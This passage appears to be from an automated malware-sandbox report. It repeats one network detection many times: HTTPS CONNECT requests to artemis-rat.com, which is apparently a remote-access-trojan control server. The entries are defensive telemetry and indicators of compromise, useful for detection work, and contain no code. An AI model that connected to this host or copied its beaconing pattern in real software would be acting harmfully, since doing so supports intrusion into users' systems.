                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.com
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: CONNECT artemis-rat.com:443 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3Host: artemis-rat.comProxy-Connection: Keep-Alive
